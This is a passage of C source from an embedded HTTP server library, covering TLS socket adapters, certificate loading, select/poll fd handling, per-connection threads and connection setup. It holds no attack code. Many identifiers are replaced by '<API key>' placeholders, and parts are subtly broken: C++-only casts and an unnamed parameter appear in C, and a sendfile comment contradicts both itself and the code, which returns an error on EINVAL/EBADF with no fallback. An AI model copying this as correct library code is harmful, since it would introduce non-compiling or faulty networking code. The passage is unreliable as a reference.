  return res;
}
/**
 * Callback for writing data to the socket.
 *
 * @param connection the MHD connection structure
 * @param other data to write
 * @param i number of bytes to write
 * @return actual number of bytes written, or -1 with errno set on error
 */
static ssize_t
send_tls_adapter (struct MHD_Connection *connection,
                  const void *other, size_t i)
{
  int res;

  res = gnutls_record_send (connection->tls_session, other, i);
  if ( (GNUTLS_E_AGAIN == res) ||
       (<API key> == res) )
    {
      /* Transient condition: report EINTR so the caller retries. */
      <API key> (EINTR);
#if EPOLL_SUPPORT
      connection->epoll_state &= ~<API key>;
#endif
      return -1;
    }
  if (res < 0)
    {
      /* some other GNUTLS error, should set 'errno'; as we do not
         really understand the error (not listed in GnuTLS
         documentation explicitly), we set 'errno' to something that
         will cause the connection to fail. */
      <API key> (ECONNRESET);
      return -1;
    }
  return res;
}
/**
 * Read and setup our certificate and key.
 *
 * @param daemon handle to daemon to initialize
 * @return 0 on success, -1 (or a negative gnutls error code) on failure
 */
static int
<API key> (struct MHD_Daemon *daemon)
{
  gnutls_datum_t key;
  gnutls_datum_t cert;

#if <API key> >= 3
  /* Prefer a user-supplied certificate callback when one was given. */
  if (NULL != daemon->cert_callback)
    {
      <API key> (daemon->x509_cred,
                 daemon->cert_callback);
    }
#endif
  if (NULL != daemon->https_mem_trust)
    {
      cert.data = (unsigned char *) daemon->https_mem_trust;
      /* NOTE(review): strlen() implies the PEM buffer must be
         NUL-terminated text -- confirm at the call sites. */
      cert.size = strlen (daemon->https_mem_trust);
      if (<API key> (daemon->x509_cred, &cert,
                     GNUTLS_X509_FMT_PEM) < 0)
        {
#if HAVE_MESSAGES
          MHD_DLOG(daemon,
                   "Bad trust certificate format\n");
#endif
          return -1;
        }
    }
  if (MHD_YES == daemon->have_dhparams)
    {
      <API key> (daemon->x509_cred,
                 daemon->https_mem_dhparams);
    }
  /* certificate & key loaded from memory */
  if ( (NULL != daemon->https_mem_cert) &&
       (NULL != daemon->https_mem_key) )
    {
      key.data = (unsigned char *) daemon->https_mem_key;
      key.size = strlen (daemon->https_mem_key);
      cert.data = (unsigned char *) daemon->https_mem_cert;
      cert.size = strlen (daemon->https_mem_cert);
      return <API key> (daemon->x509_cred,
                        &cert, &key,
                        GNUTLS_X509_FMT_PEM);
    }
#if <API key> >= 3
  /* With a certificate callback configured, in-memory cert/key
     material is not required. */
  if (NULL != daemon->cert_callback)
    return 0;
#endif
#if HAVE_MESSAGES
  MHD_DLOG (daemon,
            "You need to specify a certificate and key location\n");
#endif
  return -1;
}
/**
 * Initialize security aspects of the HTTPS daemon
 *
 * @param daemon handle to daemon to initialize
 * @return 0 on success, non-zero on error
 */
static int
MHD_TLS_init (struct MHD_Daemon *daemon)
{
  switch (daemon->cred_type)
    {
    case <API key>:
      /* X.509 credentials: allocate the credential store, then load
         the certificate/key material into it. */
      if (0 !=
          <API key> (&daemon->x509_cred))
        return <API key>;
      return <API key> (daemon);
    default:
      /* Only X.509 credentials are supported here. */
#if HAVE_MESSAGES
      MHD_DLOG (daemon,
                "Error: invalid credentials type %d specified.\n",
                daemon->cred_type);
#endif
      return -1;
    }
}
#endif
/**
 * Add @a fd to the @a set. If @a fd is
 * greater than @a max_fd, set @a max_fd to @a fd.
 *
 * @param fd file descriptor to add to the @a set
 * @param set set to modify
 * @param max_fd maximum value to potentially update
 * @param fd_setsize value of FD_SETSIZE
 * @return #MHD_YES on success, #MHD_NO otherwise
 */
static int
add_to_fd_set (MHD_socket fd,
               fd_set *set,
               MHD_socket *max_fd,
               unsigned int fd_setsize)
{
  if (NULL == set)
    return MHD_NO;
#ifdef MHD_WINSOCK_SOCKETS
  /* Winsock fd_sets are arrays with an explicit fd_count, not bitmaps;
     a full set may nevertheless already contain this fd. */
  if (set->fd_count >= fd_setsize)
    {
      if (FD_ISSET(fd, set))
        return MHD_YES;
      else
        return MHD_NO;
    }
#else // ! MHD_WINSOCK_SOCKETS
  /* POSIX fd_sets are bitmaps indexed by fd value; an fd at or beyond
     fd_setsize cannot be represented. */
  if (fd >= int(fd_setsize))
    return MHD_NO;
#endif // ! MHD_WINSOCK_SOCKETS
  FD_SET (fd, set);
  /* Track the highest valid fd seen, as needed by select(). */
  if ( (NULL != max_fd) && (MHD_INVALID_SOCKET != fd) &&
       ((fd > *max_fd) || (MHD_INVALID_SOCKET == *max_fd)) )
    *max_fd = fd;
  return MHD_YES;
}
#undef MHD_get_fdset
/**
* Obtain the `select()` sets for this daemon.
* Daemon's FDs will be added to fd_sets. To get only
* daemon FDs in fd_sets, call FD_ZERO for each fd_set
* before calling this function. FD_SETSIZE is assumed
* to be platform's default.
*
* @param daemon daemon to get sets from
* @param read_fd_set read set
* @param write_fd_set write set
* @param except_fd_set except set
* @param max_fd increased to largest FD added (if larger
* than existing value); can be NULL
* @return #MHD_YES on success, #MHD_NO if this
* daemon was not started with the right
* options for this call or any FD didn't
* fit fd_set.
* @ingroup event
*/
int
MHD_get_fdset (struct MHD_Daemon *daemon,
               fd_set *read_fd_set,
               fd_set *write_fd_set,
               fd_set *except_fd_set,
               MHD_socket *max_fd)
{
  /* Thin wrapper: delegate to MHD_get_fdset2() passing the platform's
     default set size (the redacted constant is presumably FD_SETSIZE). */
  return MHD_get_fdset2(daemon, read_fd_set,
                        write_fd_set, except_fd_set,
                        max_fd, <API key>);
}
/**
* Obtain the `select()` sets for this daemon.
* Daemon's FDs will be added to fd_sets. To get only
* daemon FDs in fd_sets, call FD_ZERO for each fd_set
* before calling this function. Passing custom FD_SETSIZE
* as @a fd_setsize allow usage of larger/smaller than
* platform's default fd_sets.
*
* @param daemon daemon to get sets from
* @param read_fd_set read set
* @param write_fd_set write set
* @param except_fd_set except set
* @param max_fd increased to largest FD added (if larger
* than existing value); can be NULL
* @param fd_setsize value of FD_SETSIZE
* @return #MHD_YES on success, #MHD_NO if this
* daemon was not started with the right
* options for this call or any FD didn't
* fit fd_set.
* @ingroup event
*/
int
MHD_get_fdset2 (struct MHD_Daemon *daemon,
                fd_set *read_fd_set,
                fd_set *write_fd_set,
                fd_set * /*except_fd_set*/,
                MHD_socket *max_fd,
                unsigned int fd_setsize)
{
  struct MHD_Connection *pos;

  /* refuse when the daemon runs its own event loop (internal select /
     thread-per-connection / poll) or is shutting down: the application
     must not select() on our FDs in those modes */
  if ( (NULL == daemon)
       || (NULL == read_fd_set)
       || (NULL == write_fd_set)
       || (MHD_YES == daemon->shutdown)
       || (0 != (daemon->options & <API key>))
       || (0 != (daemon->options & MHD_USE_POLL)))
    return MHD_NO;
#if EPOLL_SUPPORT
  if (0 != (daemon->options & <API key>))
    {
      /* we're in epoll mode, use the epoll FD as a stand-in for
         the entire event set */
      return add_to_fd_set (daemon->epoll_fd, read_fd_set, max_fd, fd_setsize);
    }
#endif
  /* the listen socket must be watched for readability (new connections) */
  if (MHD_INVALID_SOCKET != daemon->socket_fd &&
      MHD_YES != add_to_fd_set (daemon->socket_fd, read_fd_set, max_fd, fd_setsize))
    return MHD_NO;
  /* add each active connection according to what its state machine is
     currently waiting for */
  for (pos = daemon->connections_head; NULL != pos; pos = pos->next)
    {
      switch (pos->event_loop_info)
        {
        case <API key>:
          if (MHD_YES != add_to_fd_set (pos->socket_fd, read_fd_set, max_fd, fd_setsize))
            return MHD_NO;
          break;
        case <API key>:
          if (MHD_YES != add_to_fd_set (pos->socket_fd, write_fd_set, max_fd, fd_setsize))
            return MHD_NO;
          /* while writing, we can still read ahead if buffer space remains */
          if (pos->read_buffer_size > pos->read_buffer_offset &&
              MHD_YES != add_to_fd_set (pos->socket_fd, read_fd_set, max_fd, fd_setsize))
            return MHD_NO;
          break;
        case <API key>:
          /* blocked (e.g. on application); only read ahead if space remains */
          if (pos->read_buffer_size > pos->read_buffer_offset &&
              MHD_YES != add_to_fd_set (pos->socket_fd, read_fd_set, max_fd, fd_setsize))
            return MHD_NO;
          break;
        case <API key>:
          /* this should never happen */
          break;
        }
    }
#if DEBUG_CONNECT
#if HAVE_MESSAGES
  if (NULL != max_fd)
    MHD_DLOG (daemon,
              "Maximum socket in select set: %d\n",
              *max_fd);
#endif
#endif
  return MHD_YES;
}
/**
* Main function of the thread that handles an individual
* connection when #<API key> is set.
*
* @param data the `struct MHD_Connection` this thread will handle
* @return always 0
*/
static MHD_THRD_RTRN_TYPE_ MHD_THRD_CALL_SPEC_
<API key> (void *data)
{
  struct MHD_Connection *con = (struct MHD_Connection*) data;
  int num_ready;
  fd_set rs;
  fd_set ws;
  MHD_socket max;
  struct timeval tv;
  struct timeval *tvp;
  unsigned int timeout;
  time_t now;
#ifdef HAVE_POLL_H
  struct pollfd p[1];
#endif

  timeout = con->daemon->connection_timeout;
  /* event loop: wait for readiness on this one socket, then drive the
     connection state machine, until shutdown or the connection closes */
  while ( (MHD_YES != con->daemon->shutdown) &&
          (<API key> != con->state) )
    {
      tvp = NULL;
      if (timeout > 0)
        {
          now = MHD_monotonic_time();
          /* FIX: 'unsigned(...)' is C++ function-style cast syntax, not
             valid C; use a C-style cast.  The unsigned comparison also
             treats a (theoretical) backwards clock step as "expired". */
          if ((unsigned int) (now - con->last_activity) > timeout)
            tv.tv_sec = 0;
          else
            tv.tv_sec = timeout - (now - con->last_activity);
          tv.tv_usec = 0;
          tvp = &tv;
        }
#if HTTPS_SUPPORT
      if (MHD_YES == con->tls_read_ready)
        {
          /* do not block (more data may be inside of TLS buffers waiting for us) */
          tv.tv_sec = 0;
          tv.tv_usec = 0;
          tvp = &tv;
        }
#endif
      if (0 == (con->daemon->options & MHD_USE_POLL))
        {
          /* use select */
          int err_state = 0;
          FD_ZERO (&rs);
          FD_ZERO (&ws);
          max = 0;
          switch (con->event_loop_info)
            {
            case <API key>:
              if (MHD_YES != add_to_fd_set (con->socket_fd, &rs, &max, FD_SETSIZE))
                err_state = 1;
              break;
            case <API key>:
              if (MHD_YES != add_to_fd_set (con->socket_fd, &ws, &max, FD_SETSIZE))
                err_state = 1;
              /* may also read ahead while writing if buffer space remains */
              if (con->read_buffer_size > con->read_buffer_offset &&
                  MHD_YES != add_to_fd_set (con->socket_fd, &rs, &max, FD_SETSIZE))
                err_state = 1;
              break;
            case <API key>:
              /* blocked on the application: poll without blocking */
              if (con->read_buffer_size > con->read_buffer_offset &&
                  MHD_YES != add_to_fd_set (con->socket_fd, &rs, &max, FD_SETSIZE))
                err_state = 1;
              tv.tv_sec = 0;
              tv.tv_usec = 0;
              tvp = &tv;
              break;
            case <API key>:
              /* how did we get here!? */
              goto exit;
            }
          if (0 != err_state)
            {
#if HAVE_MESSAGES
              MHD_DLOG (con->daemon,
                        "Can't add FD to fd_set\n");
#endif
              goto exit;
            }
          num_ready = MHD_SYS_select_ (max + 1, &rs, &ws, NULL, tvp);
          if (num_ready < 0)
            {
              if (EINTR == MHD_socket_errno_)
                continue;
#if HAVE_MESSAGES
              MHD_DLOG (con->daemon,
                        "Error during select (%d): `%s'\n",
                        MHD_socket_errno_,
                        <API key> ());
#endif
              break;
            }
          /* call appropriate connection handler if necessary */
          if ( (FD_ISSET (con->socket_fd, &rs))
#if HTTPS_SUPPORT
               || (MHD_YES == con->tls_read_ready)
#endif
               )
            con->read_handler (con);
          if (FD_ISSET (con->socket_fd, &ws))
            con->write_handler (con);
          if (MHD_NO == con->idle_handler (con))
            goto exit;
        }
#ifdef HAVE_POLL_H
      else
        {
          /* use poll */
          memset (&p, 0, sizeof (p));
          p[0].fd = con->socket_fd;
          switch (con->event_loop_info)
            {
            case <API key>:
              p[0].events |= POLLIN;
              break;
            case <API key>:
              p[0].events |= POLLOUT;
              if (con->read_buffer_size > con->read_buffer_offset)
                p[0].events |= POLLIN;
              break;
            case <API key>:
              if (con->read_buffer_size > con->read_buffer_offset)
                p[0].events |= POLLIN;
              tv.tv_sec = 0;
              tv.tv_usec = 0;
              tvp = &tv;
              break;
            case <API key>:
              /* how did we get here!? */
              goto exit;
            }
          if (poll (p, 1,
                    (NULL == tvp) ? -1 : tv.tv_sec * 1000) < 0)
            {
              if (EINTR == MHD_socket_errno_)
                continue;
#if HAVE_MESSAGES
              MHD_DLOG (con->daemon, "Error during poll: `%s'\n",
                        <API key> ());
#endif
              break;
            }
          if ( (0 != (p[0].revents & POLLIN))
#if HTTPS_SUPPORT
               || (MHD_YES == con->tls_read_ready)
#endif
               )
            con->read_handler (con);
          if (0 != (p[0].revents & POLLOUT))
            con->write_handler (con);
          /* error/hangup: close the connection (redacted close call) */
          if (0 != (p[0].revents & (POLLERR | POLLHUP)))
            <API key> (con, <API key>);
          if (MHD_NO == con->idle_handler (con))
            goto exit;
        }
#endif
    }
  /* loop left due to shutdown: force the connection into a closed state
     and run the idle handler once to queue it for cleanup */
  if (<API key> != con->state)
    {
#if DEBUG_CLOSE
#if HAVE_MESSAGES
      MHD_DLOG (con->daemon,
                "Processing thread terminating, closing connection\n");
#endif
#endif
      if (<API key> != con->state)
        <API key> (con,
                   <API key>);
      con->idle_handler (con);
    }
exit:
  if (NULL != con->response)
    {
      <API key> (con->response);
      con->response = NULL;
    }
  return (MHD_THRD_RTRN_TYPE_)0;
}
/**
* Callback for receiving data from the socket.
*
* @param connection the MHD connection structure
* @param other where to write received data to
* @param i maximum size of other (in bytes)
* @return number of bytes actually received
*/
static ssize_t
recv_param_adapter (struct MHD_Connection *connection,
                    void *other,
                    size_t i)
{
  ssize_t ret;

  /* refuse to read from a connection that is already closed */
  if ( (MHD_INVALID_SOCKET == connection->socket_fd) ||
       (<API key> == connection->state) )
    {
      /* redacted call with ENOTCONN — presumably sets the socket errno;
         TODO confirm */
      <API key> (ENOTCONN);
      return -1;
    }
#if WINDOWS
  /* WinSock recv() takes a char* buffer */
  ret = recv (connection->socket_fd, (char*) other, i, MSG_NOSIGNAL);
#else
  ret = recv (connection->socket_fd, other, i, MSG_NOSIGNAL);
#endif
#if EPOLL_SUPPORT
  /* a short read means the kernel buffer is drained: clear the
     edge-triggered "ready to read" state bit so we wait for the next edge */
  if (ret < (ssize_t) i)
    {
      connection->epoll_state &= ~<API key>;
    }
#endif
  return ret;
}
/**
* Callback for writing data to the socket.
*
* @param connection the MHD connection structure
* @param other data to write
* @param i number of bytes to write
* @return actual number of bytes written
*/
static ssize_t
send_param_adapter (struct MHD_Connection *connection,
                    const void *other,
                    size_t i)
{
  ssize_t ret;
#if LINUX
  MHD_socket fd;
  off_t offset;
  off_t left;
#endif

  /* refuse to write to a connection that is already closed */
  if ( (MHD_INVALID_SOCKET == connection->socket_fd) ||
       (<API key> == connection->state) )
    {
      /* redacted call with ENOTCONN — presumably sets the socket errno;
         TODO confirm */
      <API key> (ENOTCONN);
      return -1;
    }
  /* TLS mode: this adapter is also installed as the TLS push callback
     (see connection setup), so the bytes arriving here are presumably
     already encrypted; send them directly and skip the sendfile path. */
  if (0 != (connection->daemon->options & MHD_USE_SSL))
#if WINDOWS
    return send (connection->socket_fd, (const char*) other, i, MSG_NOSIGNAL);
#else
    return send (connection->socket_fd, other, i, MSG_NOSIGNAL);
#endif
#if LINUX
  /* zero-copy fast path: if we are in the body-sending phase and the
     response is backed by a file descriptor, use sendfile() */
  if ( (connection-><API key> ==
        connection-><API key>) &&
       (NULL != connection->response) &&
       (MHD_INVALID_SOCKET != (fd = connection->response->fd)) )
    {
      /* can use sendfile */
      offset = (off_t) connection-><API key> + connection->response->fd_off;
      left = connection->response->total_size - connection-><API key>;
      if (left > SSIZE_MAX)
        left = SSIZE_MAX; /* cap at return value limit */
      if (-1 != (ret = sendfile (connection->socket_fd,
                                 fd,
                                 &offset,
                                 (size_t) left)))
        {
#if EPOLL_SUPPORT
          /* short write: kernel buffer full, clear edge-trigger state */
          if (ret < left)
            {
              connection->epoll_state &= ~<API key>;
            }
#endif
          return ret;
        }
      const int err = MHD_socket_errno_;
      /* transient errors: report "nothing sent" and let the caller retry */
      if ( (EINTR == err) || (EAGAIN == err) || (EWOULDBLOCK == err) )
        return 0;
      /* sendfile() not usable for this FD (e.g. not a regular file):
         EINVAL/EBADF fall back is NOT taken here; other errors fall
         through to the plain send() below */
      if ( (EINVAL == err) || (EBADF == err) )
        return -1;
    }
#endif
#if WINDOWS
  ret = send (connection->socket_fd, (const char*) other, i, MSG_NOSIGNAL);
#else
  ret = send (connection->socket_fd, other, i, MSG_NOSIGNAL);
#endif
#if EPOLL_SUPPORT
  /* short write: kernel buffer full, clear edge-trigger state */
  if (ret < (ssize_t) i)
    {
      connection->epoll_state &= ~<API key>;
    }
#endif
  /* normalize: make sure a failure always carries a non-zero errno */
  if ( (-1 == ret) && (0 == errno) )
    errno = ECONNRESET;
  return ret;
}
/**
 * Signature of main function for a thread; shared by the POSIX and
 * W32 thread backends of create_thread().
 *
 * @param cls closure argument for the function
 * @return termination code from the thread
 */
typedef MHD_THRD_RTRN_TYPE_ (MHD_THRD_CALL_SPEC_ *ThreadStartRoutine)(void *cls);
/**
* Create a thread and set the attributes according to our options.
*
* @param thread handle to initialize
* @param daemon daemon with options
* @param start_routine main function of thread
* @param arg argument for start_routine
* @return 0 on success
*/
static int
create_thread (MHD_thread_handle_ *thread,
               const struct MHD_Daemon *daemon,
               ThreadStartRoutine start_routine,
               void *arg)
{
#if defined(<API key>)
  pthread_attr_t attr;
  pthread_attr_t *pattr;
  int ret;

  /* apply the configured stack size, if any, via a thread attribute */
  if (0 != daemon->thread_stack_size)
    {
      if (0 != (ret = pthread_attr_init (&attr)))
        goto ERR;
      if (0 != (ret = <API key> (&attr, daemon->thread_stack_size)))
        {
          <API key> (&attr);
          goto ERR;
        }
      pattr = &attr;
    }
  else
    {
      pattr = NULL;
    }
  ret = pthread_create (thread, pattr,
                        start_routine, arg);
#ifdef <API key>
  /* FIX: only set the thread name when creation succeeded; on failure
     '*thread' is indeterminate and passing it to pthread_setname_np()
     is undefined behavior. */
  if (0 == ret)
    (void) pthread_setname_np (*thread, "libmicrohttpd");
#endif /* <API key> */
  if (0 != daemon->thread_stack_size)
    <API key> (&attr);
  return ret;
 ERR:
#if HAVE_MESSAGES
  MHD_DLOG (daemon,
            "Failed to set thread stack size\n");
#endif
  errno = EINVAL;
  return ret;
#elif defined(MHD_USE_W32_THREADS)
  *thread = CreateThread(NULL, daemon->thread_stack_size, start_routine,
                         arg, 0, NULL);
  return (NULL != (*thread)) ? 0 : 1;
#endif
}
/**
* Add another client connection to the set of connections
* managed by MHD. This API is usually not needed (since
* MHD will accept inbound connections on the server socket).
* Use this API in special cases, for example if your HTTP
* server is behind NAT and needs to connect out to the
* HTTP client.
*
* The given client socket will be managed (and closed!) by MHD after
* this call and must no longer be used directly by the application
* afterwards.
*
* Per-IP connection limits are ignored when using this API.
*
* @param daemon daemon that manages the connection
* @param client_socket socket to manage (MHD will expect
* to receive an HTTP request from this socket next).
* @param addr IP address of the client
* @param addrlen number of bytes in @a addr
* @param external_add perform additional operations needed due
* to the application calling us directly
* @return #MHD_YES on success, #MHD_NO if this daemon could
* not handle the connection (i.e. malloc failed, etc).
* The socket will be closed in any case; 'errno' is
* set to indicate further details about the error.
*/
static int
<API key> (struct MHD_Daemon *daemon,
           MHD_socket client_socket,
           const struct sockaddr *addr,
           socklen_t addrlen,
           int external_add)
{
  struct MHD_Connection *connection;
  int res_thread_create;
  unsigned int i;
  int eno;
  struct MHD_Daemon *worker;
#if OSX
  static int on = 1;
#endif

  if (NULL != daemon->worker_pool)
    {
      /* have a pool, try to find a pool with capacity; we use the
         socket as the initial offset into the pool for load
         balancing */
      for (i=0;i<daemon->worker_pool_size;i++)
        {
          worker = &daemon->worker_pool[(i + client_socket) % daemon->worker_pool_size];
          if (worker->connections < worker->connection_limit)
            return <API key> (worker,
                              client_socket,
                              addr, addrlen,
                              external_add);
        }
      /* all pools are at their connection limit, must refuse */
      if (0 != MHD_socket_close_ (client_socket))
        MHD_PANIC ("close failed\n");
#if ENFILE
      errno = ENFILE;
#endif
      return MHD_NO;
    }
#ifndef WINDOWS
  /* in select()-based modes, FDs >= FD_SETSIZE cannot be monitored */
  if ( (client_socket >= FD_SETSIZE) &&
       (0 == (daemon->options & (MHD_USE_POLL | <API key>))) )
    {
#if HAVE_MESSAGES
      MHD_DLOG (daemon,
                "Socket descriptor larger than FD_SETSIZE: %d > %d\n",
                client_socket,
                FD_SETSIZE);
#endif
      if (0 != MHD_socket_close_ (client_socket))
        MHD_PANIC ("close failed\n");
#if EINVAL
      errno = EINVAL;
#endif
      return MHD_NO;
    }
#endif
#if HAVE_MESSAGES
#if DEBUG_CONNECT
  MHD_DLOG (daemon,
            "Accepted connection on socket %d\n",
            client_socket);
#endif
#endif
  /* enforce total and per-IP connection limits */
  if ( (daemon->connections == daemon->connection_limit) ||
       (MHD_NO == MHD_ip_limit_add (daemon, addr, addrlen)) )
    {
      /* above connection limit - reject */
#if HAVE_MESSAGES
      MHD_DLOG (daemon,
                "Server reached connection limit (closing inbound connection)\n");
#endif
      if (0 != MHD_socket_close_ (client_socket))
        MHD_PANIC ("close failed\n");
#if ENFILE
      errno = ENFILE;
#endif
      return MHD_NO;
    }
  /* apply connection acceptance policy if present */
  if ( (NULL != daemon->apc) &&
       (MHD_NO == daemon->apc (daemon->apc_cls,
                               addr, addrlen)) )
    {
#if DEBUG_CLOSE
#if HAVE_MESSAGES
      MHD_DLOG (daemon,
                "Connection rejected, closing connection\n");
#endif
#endif
      if (0 != MHD_socket_close_ (client_socket))
        MHD_PANIC ("close failed\n");
      MHD_ip_limit_del (daemon, addr, addrlen);
      /* NOTE(review): 'EACCESS' (double-S) is unusual; POSIX spells it
         EACCES — presumably a compatibility macro, confirm upstream */
#if EACCESS
      errno = EACCESS;
#endif
      return MHD_NO;
    }
#if OSX
#ifdef SOL_SOCKET
#ifdef SO_NOSIGPIPE
  /* OS X has no MSG_NOSIGNAL; suppress SIGPIPE at the socket level */
  setsockopt (client_socket,
              SOL_SOCKET, SO_NOSIGPIPE,
              &on, sizeof (on));
#endif
#endif
#endif
  if (NULL == (connection = (struct MHD_Connection*) malloc (sizeof (struct MHD_Connection))))
    {
      eno = errno;
#if HAVE_MESSAGES
      MHD_DLOG (daemon,
                "Error allocating memory: %s\n",
                MHD_strerror_ (errno));
#endif
      if (0 != MHD_socket_close_ (client_socket))
        MHD_PANIC ("close failed\n");
      MHD_ip_limit_del (daemon, addr, addrlen);
      errno = eno;
      return MHD_NO;
    }
  memset (connection, 0, sizeof (struct MHD_Connection));
  connection->pool = MHD_pool_create (daemon->pool_size);
  if (NULL == connection->pool)
    {
#if HAVE_MESSAGES
      MHD_DLOG (daemon,
                "Error allocating memory: %s\n",
                MHD_strerror_ (errno));
#endif
      if (0 != MHD_socket_close_ (client_socket))
        MHD_PANIC ("close failed\n");
      MHD_ip_limit_del (daemon, addr, addrlen);
      free (connection);
#if ENOMEM
      errno = ENOMEM;
#endif
      return MHD_NO;
    }
  connection->connection_timeout = daemon->connection_timeout;
  /* FIX: '(sockaddr*)' is C++ syntax; C requires the 'struct' tag. */
  if (NULL == (connection->addr = (struct sockaddr *) malloc (addrlen)))
    {
      eno = errno;
#if HAVE_MESSAGES
      MHD_DLOG (daemon,
                "Error allocating memory: %s\n",
                MHD_strerror_ (errno));
#endif
      if (0 != MHD_socket_close_ (client_socket))
        MHD_PANIC ("close failed\n");
      MHD_ip_limit_del (daemon, addr, addrlen);
      MHD_pool_destroy (connection->pool);
      free (connection);
      errno = eno;
      return MHD_NO;
    }
  memcpy (connection->addr, addr, addrlen);
  connection->addr_len = addrlen;
  connection->socket_fd = client_socket;
  connection->daemon = daemon;
  connection->last_activity = MHD_monotonic_time();
  /* set default connection handlers */
  <API key> (connection);
  connection->recv_cls = &recv_param_adapter;
  connection->send_cls = &send_param_adapter;
  if (0 == (connection->daemon->options & MHD_USE_EPOLL_TURBO))
    {
      /* non-blocking sockets are required on most systems and for GNUtls;
         however, they somehow cause serious problems on CYGWIN (#1824);
         in turbo mode, we assume that non-blocking was already set
         by 'accept4' or whoever calls 'MHD_add_connection' */
#ifdef CYGWIN
      if (0 != (daemon->options & MHD_USE_SSL))
#endif
        {
          /* make socket non-blocking */
#if !defined(WINDOWS) || defined(CYGWIN)
          int flags = fcntl (connection->socket_fd, F_GETFL);
          if ( (-1 == flags) ||
               (0 != fcntl (connection->socket_fd, F_SETFL, flags | O_NONBLOCK)) )
            {
#if HAVE_MESSAGES
              MHD_DLOG (daemon,
                        "Failed to make socket non-blocking: %s\n",
                        <API key> ());
#endif
            }
#else
          unsigned long flags = 1;
          if (0 != ioctlsocket (connection->socket_fd, FIONBIO, &flags))
            {
#if HAVE_MESSAGES
              MHD_DLOG (daemon,
                        "Failed to make socket non-blocking: %s\n",
                        <API key> ());
#endif
            }
#endif
        }
    }
#if HTTPS_SUPPORT
  if (0 != (daemon->options & MHD_USE_SSL))
    {
      /* route all I/O through the TLS adapters and start the handshake */
      connection->recv_cls = &recv_tls_adapter;
      connection->send_cls = &send_tls_adapter;
      connection->state = <API key>;
      <API key> (connection);
      gnutls_init (&connection->tls_session, GNUTLS_SERVER);
      gnutls_priority_set (connection->tls_session,
                           daemon->priority_cache);
      switch (daemon->cred_type)
        {
          /* set needed credentials for certificate authentication. */
        case <API key>:
          <API key> (connection->tls_session,
                     <API key>,
                     daemon->x509_cred);
          break;
        default:
#if HAVE_MESSAGES
          MHD_DLOG (connection->daemon,
                    "Failed to setup TLS credentials: unknown credential type %d\n",
                    daemon->cred_type);
#endif
          if (0 != MHD_socket_close_ (client_socket))
            MHD_PANIC ("close failed\n");
          MHD_ip_limit_del (daemon, addr, addrlen);
          free (connection->addr);
          free (connection);
          MHD_PANIC ("Unknown credential type");
          /* below is unreachable after the panic; kept for non-fatal
             MHD_PANIC configurations */
#if EINVAL
          errno = EINVAL;
#endif
          return MHD_NO;
        }
      /* hand the connection pointer to gnutls and wire our socket
         adapters in as its transport push/pull functions */
      <API key> (connection->tls_session,
                 (<API key>) connection);
      <API key> (connection->tls_session,
                 (gnutls_pull_func) &recv_param_adapter);
      <API key> (connection->tls_session,
                 (gnutls_push_func) &send_param_adapter);
      if (daemon->https_mem_trust)
        <API key> (connection->tls_session,
                   GNUTLS_CERT_REQUEST);
    }
#endif
  /* register the connection in the timeout and connection lists */
  if ( (0 != (daemon->options & <API key>)) &&
       (MHD_YES != MHD_mutex_lock_ (&daemon-><API key>)) )
    MHD_PANIC ("Failed to acquire cleanup mutex\n");
  XDLL_insert (daemon->normal_timeout_head,
               daemon->normal_timeout_tail,
               connection);
  DLL_insert (daemon->connections_head,
              daemon->connections_tail,
              connection);
  if ( (0 != (daemon->options & <API key>)) &&
       (MHD_YES != MHD_mutex_unlock_ (&daemon-><API key>)) )
    MHD_PANIC ("Failed to release cleanup mutex\n");
  /* attempt to create handler thread */
  if (0 != (daemon->options & <API key>))
    {
      res_thread_create = create_thread (&connection->pid, daemon,
                                         &<API key>, connection);
      if (0 != res_thread_create)
        {
          eno = errno;
#if HAVE_MESSAGES
          MHD_DLOG (daemon,
                    "Failed to create a thread: %s\n",
                    MHD_strerror_ (res_thread_create));
#endif
          goto cleanup;
        }
    }
  else
    /* externally added connection in internal-select mode: wake the
       event loop via the pipe so the new FD is picked up immediately */
    if ( (MHD_YES == external_add) &&
         (MHD_INVALID_PIPE_ != daemon->wpipe[1]) &&
         (1 != MHD_pipe_write_ (daemon->wpipe[1], "n", 1)) )
      {
#if HAVE_MESSAGES
        MHD_DLOG (daemon,
                  "failed to signal new connection via pipe");
#endif
      }
#if EPOLL_SUPPORT
  if (0 != (daemon->options & <API key>))
    {
      if (0 == (daemon->options & MHD_USE_EPOLL_TURBO))
        {
          struct epoll_event event;

          event.events = EPOLLIN | EPOLLOUT | EPOLLET;
          event.data.ptr = connection;
          if (0 != epoll_ctl (daemon->epoll_fd,
                              EPOLL_CTL_ADD,
                              client_socket,
                              &event))
            {
              eno = errno;
#if HAVE_MESSAGES
              MHD_DLOG (daemon,
                        "Call to epoll_ctl failed: %s\n",
                        <API key> ());
#endif
              goto cleanup;
            }
          connection->epoll_state |= <API key>;
        }
      else
        {
          /* turbo mode: skip epoll registration, optimistically mark the
             connection ready and queue it on the "eready" list */
          connection->epoll_state |= <API key> | <API key>
            | <API key>;
          EDLL_insert (daemon->eready_head,
                       daemon->eready_tail,
                       connection);
        }
    }
#endif
  daemon->connections++;
  return MHD_YES;
 cleanup:
  /* unwind everything registered above, restore 'errno' from 'eno' */
  if (0 != MHD_socket_close_ (client_socket))
    MHD_PANIC ("close failed\n");
  MHD_ip_limit_del (daemon, addr, addrlen);
  if ( (0 != (daemon->options & <API key>)) &&
       (MHD_YES != MHD_mutex_lock_ (&daemon-><API key>)) )
    MHD_PANIC ("Failed to acquire cleanup mutex\n");
  DLL_remove (daemon->connections_head,
              daemon->connections_tail,
              connection);
  XDLL_remove (daemon->normal_timeout_head,
               daemon->normal_timeout_tail,
               connection);
  if ( (0 != (daemon->options & <API key>)) &&
       (MHD_YES != MHD_mutex_unlock_ (&daemon-><API key>)) )
    MHD_PANIC ("Failed to release cleanup mutex\n");
  MHD_pool_destroy (connection->pool);
  free (connection->addr);
  free (connection);
#if EINVAL
  errno = eno;
#endif
  return MHD_NO;
}
/**
* Suspend handling of network data for a given connection. This can
* be used to dequeue a connection from MHD's event loop (external
* select, internal select or thread pool; not applicable to
* <API key>!) for a while.
*
* If you use this API in conjunction with a internal select or a
* thread pool, you must set the option #<API key> to
* ensure that a resumed connection is immediately processed by MHD.
*
* Suspended connections continue to count against the total number of
* connections allowed (per daemon, as well as per IP, if such limits
* are set). Suspended connections will NOT time out; timeouts will
* restart when the connection handling is resumed. While a
* connection is suspended, MHD will not detect disconnects by the
* client.
*
* The only safe time to suspend a connection is from the
* #<API key>.
*
* Finally, it is an API violation to call #MHD_stop_daemon while
* having suspended connections (this will at least create memory and
* socket leaks or lead to undefined behavior). You must explicitly
